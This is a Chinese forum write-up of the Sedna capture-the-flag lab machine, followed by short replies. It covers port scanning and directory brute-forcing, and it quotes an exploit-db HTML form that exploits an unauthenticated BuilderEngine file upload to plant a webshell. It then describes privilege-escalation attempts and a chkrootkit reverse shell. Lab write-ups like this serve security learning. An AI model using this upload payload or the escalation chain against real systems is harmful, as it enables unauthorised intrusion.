Sedna靶场

信息收集

Nmap

开放端口:

22 53 80 110 111 139 143 445 993 995 8080

开放服务:

 OpenSSH 6.6.1p1  
 ISC BIND 9.9.5-3
 Apache httpd 2.4.7 Dovecot pop3d
 Samba smbd 3.X - 4.X ssl/imaps?
 Apache Tomcat7/Coyote JSP engine 1.1

暴力目录探测

links
http://192.168.88.134/blocks/
http://192.168.88.134/files/
http://192.168.88.134/index.html
http://192.168.88.134/modules/
http://192.168.88.134/robots.txt
http://192.168.88.134/server
http://192.168.88.134/license.txt
http://192.168.88.134/system/
http://192.168.88.134/themes/
http://192.168.88.134/modules/
http://192.168.88.134/system/
http://192.168.88.134/system/core/
http://192.168.88.134/system/database/
http://192.168.88.134/system/fonts/
http://192.168.88.134/system/helpers/
http://192.168.88.134/system/index.html
http://192.168.88.134/system/language/
http://192.168.88.134/system/libraries/
http://192.168.88.134/themes/
http://192.168.88.134/system/core/
http://192.168.88.134/system/core/compat/
http://192.168.88.134/system/core/index.html
http://192.168.88.134/system/database/
http://192.168.88.134/system/database/drivers/
http://192.168.88.134/system/database/index.html
http://192.168.88.134/system/fonts/
http://192.168.88.134/system/fonts/index.html
http://192.168.88.134/system/helpers/
http://192.168.88.134/system/helpers/index.html
http://192.168.88.134/system/language/
http://192.168.88.134/system/language/english/
http://192.168.88.134/system/language/index.html
http://192.168.88.134/system/libraries/
http://192.168.88.134/system/libraries/index.html
http://192.168.88.134/system/core/compat/
http://192.168.88.134/system/core/compat/index.html
http://192.168.88.134/system/database/drivers/
http://192.168.88.134/system/database/drivers/index.html
http://192.168.88.134/system/database/drivers/mssql/
http://192.168.88.134/system/database/drivers/mysql/
http://192.168.88.134/system/database/drivers/odbc/
http://192.168.88.134/system/language/english/
http://192.168.88.134/system/language/english/index.html
http://192.168.88.134/system/database/drivers/mssql/
http://192.168.88.134/system/database/drivers/mssql/index.html
http://192.168.88.134/system/database/drivers/mysql/index.html
http://192.168.88.134/system/database/drivers/odbc/index.html

漏洞发现

根据nmap扫描出来的端口和服务看了看貌似没啥能利用的漏洞,看一下dirb都爬到了什么信息,全部看完,发现没什么思路,又仔细看了第二遍,发现

     http://192.168.88.134/license.txt

这个地方


看到Radian Enterprise,Enterprise貌似是企业的意思,放到google里搜索一圈,

看到Radian Enterprise,Enterprise貌似是企业的意思,放到google里搜索一圈,

漏洞利用

初步利用

谷歌告诉我们这个的确存在漏洞,漏洞大概在BuilderEngine任意文件上传,
查看exploit-db,

1) Unauthenticated Unrestricted File Upload:
	POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
	Vulnerable Parameter: files[]
	We can upload test.php and reach the file via the following link:
	/files/test.php--><html><body><form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
	<input type="file" name="files[]" />
	<input type="submit" value="send" /></form></body></html>

告诉我们,要我们把下面的代码以post方式传上去

用蚁剑连接shell

查看第一个flagfbb7e6e6e88d9ae66848b9aeac6b289

深度利用

深入,我们发现我们的用户是www-data权限,我们cat /etc/os-release发现这个系统是ubuntu14.04.1,其实我们

NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL=http://bugs.launchpad.net/ubuntu/


通过seachsploit搜索相关exploit,发现可用的有脏牛,还有一个内核提权的漏洞,我们上船之后,发现编译执行无法提权,
我们根据我们之前nmap出的信息,openssh版本太高没啥可利用的漏洞,
脏牛,我们发现一祭出脏牛,吧唧就崩溃了,
apache2.4.7貌似有一个信息泄漏,我们要的是拿flag提权对吧,也没啥用,不关注了
Apachetomcat7,有一个cve-2016-1240本地提权的,exp传上去发现明明存在comcat7但是就是提不了权,继续看
我们继续google,发现可以用chkrootkit0.49提权,反弹shell监听msf利用拿flag

1赞

大佬目录探测用的啥工具

就parrot鹦鹉自带的dirb啊

:laughing:初来乍到,码一下

楼主能不能分享你的书签

群文件中有,之前分享过,现在书签有很多隐私,脱敏很麻烦


服务器资源由ZeptoVM赞助

Partners Wiki IRC